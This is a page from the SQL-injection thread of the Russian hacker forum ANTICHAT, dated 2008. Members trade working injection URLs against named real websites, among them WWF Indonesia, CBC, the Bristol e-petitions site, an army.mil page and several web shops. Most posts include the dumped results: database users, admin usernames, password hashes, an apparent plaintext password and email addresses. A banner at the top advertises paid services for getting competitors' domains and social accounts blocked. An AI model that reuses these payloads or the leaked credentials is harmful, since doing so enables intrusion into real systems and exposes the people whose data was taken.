УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 470 из 1242

470

Опции темы

Поиск в этой теме

Опции просмотра

#4691

07.02.2008, 13:33

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

wwf.or.id - инданезийское представительство Всемирного фонда дикой природы
(Есть прикольный такой лэйбл с пандой!)

Код:

http://www.wwf.or.id/tessonilo/Default.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15/*&wwf_lang=1

5.0.37:wwfdb:wwfid@localhost

#4692

07.02.2008, 16:39

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

Yadro banner network

Код:

http://web.yadro.ru/vbnstat.php3?vbnum=2+and+1=if(ascii((select+version())=0x34),1,0)--

версия mysql 4
// вообще в запросе 12 полей и отлично проходит запрос вида ?vbnum=-2+UniOn+selEct+1,2,3,4,5,6,7,8,9,0,1,2--
но, нормально раскрутить не получилось, как цель себе не ставил
======================
SecurIT — защита информации, информационная безопасность /Программы Zlock, Zserver.../

Код:

http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,0,1--

5.0.45-log:u17160@10.10.10.219:u17160

Код:

http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,0,1+from+information_schema.columns+where+column_name=0x70617373776f7264+limit+0,1--

u17160:USERS:PASSWORD

Последний раз редактировалось big_BRAT; 07.02.2008 в 16:43..

#4693

07.02.2008, 17:12

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://shop.dipngrip.com/customer_testimonials.php?testimonial_id=99999+uni on+sele ct+1,2,concat(customers_lastname,0x3a,customers_pa ssword,0x3a,customers_email_address),4,5,6,7,8+fro m+customers/
*
http://www.wi-gear.com/customer_testimonials.php?testimonial_id=99999+uni on+sel ect+1,2,concat(customers_lastname,0x3a,customers_p assword,0x3a,customers_email_address),4,5,6,7,8+fr om+customers/*
http://www.stoneycreekshop.co.nz/customer_testimonials.php?testimonial_id=99999+uni on+sele
ct+1,2,concat(customers_lastname,0x3a,customers_pa ssword,0x3a,customers_email_address),4,5,6,7,8+fro m+customers/*
http://www.littlepinkshop.com/shop/customer_testimonials.php?testimonial_id=99999+uni o n+select+1,2,concat(customers_lastname,0x3a,custom ers_password,0x3a,customers_email_address),4,5,6,7 ,8+from+customers/*
http://www.genesissurfshop.com/shop/customer_testimonials.php?testimonial_id=99999+uni on+se
lect+1,2,concat(customers_lastname,0x3a,customers_ password,0x3a,customers_email_address),4,5,6,7,8+f rom+customers/*
http://www.jaxteas.com/customer_testimonials.php?testimonial_id=99999+uni o
n+select+1,2,concat(customers_lastname,0x3a,custom ers_password,0x3a,customers_email_address),4,5,6,7 ,8+from+customers/*

#4694

07.02.2008, 17:17

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

http://www.bulgarianbasket.com/

Код HTML:

http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*

4.0.24_Debian-9:u397425_DB10614@wh2.dirbg.com: DB10614
(поле вывода в заголовке страницы)

Код HTML:

http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,username,userpass)+FROM+user/*

vladi:7605f18a510a03c7::vladi

http://www.hpol.org/

Код HTML:

http://www.hpol.org/transcript.php?id=-72+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*

5.0.27:ro@localhost:hpol

http://www.cbc.ca/

Код HTML:

http://www.cbc.ca/thehour/video.php?id=-1073+UNION+SELECT+null,null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/

PostgreSQL 7.4.17 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.3 (SuSE Linux)
(здесь мне пришлось помучаться )

#4695

07.02.2008, 22:48

nex0

Познающий

Регистрация: 06.11.2007

Сообщений: 57

Провел на форуме:
2688963

Репутация: 272

Отправить сообщение для nex0 с помощью ICQ

metallica.ru

Код:

http://www.metallica.ru/bbs.php3?id=999999999+union+select+convert(concat(version(),%22:%22,user(),%22:%22,database()),binary)/*

version() 4.1.16
user() acillatem@localhost
database() meta2000

iso-9001.ru

Код:

http://www.iso-9001.ru/index.php3?id=146+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9

version() 4.1.22
user() so_user@localhost
database() iso_9001

pricenews.dp.ua

Код:

http://www.pricenews.dp.ua/predpr.php3?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1999,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*

version() 5.0.27
user() dprice@localhost
database() price

http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version() ,5,6,7,8,9/*
infon.ru

Код:

http://www.infon.ru/notice.phtml?nid=99999+union+select+1,convert((concat(version(),0x3a,user(),0x3a,database())),binary)

version() 4.1.12
user() portal_manjet@localhost
database() portal_manjet

sosna.ru

Код:

http://www.sosna.ru/index.phtml?nid=99999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6/*

version() 5.0.45-log
user() u71952@10.10.223.224
database() u71952_sosna_ru

vogss.ru

Код:

www.vogss.ru/print.phtml?nid=999+union+select+1,2,3/*

version() 4.1.22-log
user() vogss@localhost
database() vogss

elitwater.ru

Код:

http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version(),5,6,7,8,9/*

version() 5.0.22
user() elitwater@localhost
database() elitwater

gov?!

#4696

07.02.2008, 23:00

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

gov?!

http://epetitions.bristol.gov.uk/

Код HTML:

http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14/*

5.0.44-log:epetitioner_user@localhost:bristol_epetitioner

Код HTML:

http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+1,concat_ws(0x3a,id,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14+FROM+usertemp/*

1:mcheverton: password:miles.cheverton@public-i.info
(http://epetitions.bristol.gov.uk/)

http://www.pjn.gov.ar/

Код HTML:

http://www.pjn.gov.ar/getobj.php?id=-25722+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database())/*

5.0.38-Ubuntu_0ubuntu1-log: pjn@192.168.1.40:webpjn

Последний раз редактировалось ~EviL~; 08.02.2008 в 01:10..

#4697

08.02.2008, 01:16

Momiji

Постоянный

Регистрация: 25.08.2007

Сообщений: 530

Провел на форуме:
3926698

Репутация: 1446

Отправить сообщение для Momiji с помощью ICQ

intersoft.pl

Код:

http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user(),database()),3,4,5+from+mysql.user/*

5.0.22-community-ntcms@iron.INTERsoft.localintersoft

Код:

http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user(),database()),3,4,5+from+mysql.user/*

root74ecc53c5b07539b
admin56e5812a73345d40
cms4c6676a15e990b3c
sklep7e3186c51e422e57
ankieta28583f5150f129bc
forum0c87462e7823e478
arcadia465e2df62544abdd

Код:

http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,id,user,pass,imie,nazwisko),3,4,5+from+admins/*

1adminjch123JaroslawChudzik
Админка: http://www.intersoft.pl/admin/

#4698

08.02.2008, 14:03

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

http://specserver.com/rus/notice.asp?groupID=1+or+1=@@version--

#4699

08.02.2008, 15:52

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

www.lanbilling.ru
LANBilling биллинговая система

Код:

http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*

5.0.26:lbdownuser@84.16.130.34:lb_download

Код:

http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.tables+limit+0,1/*

интересные таблицы(поля):
pafiledb_admin(admin_id,admin_username,admin_password,admin_emai l)
pafiledb_license(license_id,license_name,license_text)

1:Admin:f41b01afce262acf56b0f89b6c88b732

===============================
только что просмотрел исходник страницы оказывается это paFileDB 3.0. и на securitylab не нашёл инфы о такой иньекции,

это потянет на новость?)))
----------------
поставил последнюю версию paFileDB, фишка не работает, уже стоит intval()

Последний раз редактировалось big_BRAT; 08.02.2008 в 17:34..

#4700

08.02.2008, 16:28

NilsonUA

Познающий

Регистрация: 25.11.2007

Сообщений: 55

Провел на форуме:
493288

Репутация: 58

Отправить сообщение для NilsonUA с помощью ICQ

http://www4.army.mil/otf/story.php?id=-56%20UNION%20SELECT%201,2,concat_ws(0x3,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6+FROM+users/*

Дальше раскрыть не удалось...

Последний раз редактировалось NilsonUA; 08.02.2008 в 16:32..

Страница 470 из 1242

470

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход